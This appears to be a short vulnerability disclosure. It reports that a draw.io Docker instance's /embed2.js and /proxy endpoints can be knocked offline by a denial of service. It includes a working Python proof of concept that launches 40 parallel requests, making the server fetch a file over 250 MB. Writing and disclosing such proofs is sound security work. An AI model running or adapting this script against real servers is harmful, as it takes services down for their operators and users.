consider following script
exploit.py
put drawio_docker_instace your address and also big_file_address should be serve a big image file ( > 250 MB)
from multiprocessing import Process
import requests
def fun():
try:
requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
#requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
print("OK")
except:
print("error from server")
def main():
for i in range(1,40):
p = Process(target=fun, args=())
p.start()
if __name__ == '__main__':
main()
I upload forty 250MB photos at the same time, and the server hangs up ( I test it on upcloud basic server plan)
both /proxy
and /embed2.js
was vulnerable to DOS and /embed2.js
was more vulnerable as I saw in docker status
you can check it yourself with my POC.py file
The POC is for the /embed2.js
endpoint and for the /proxy
endpoint we should increase the number of simultaneously Processes
https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing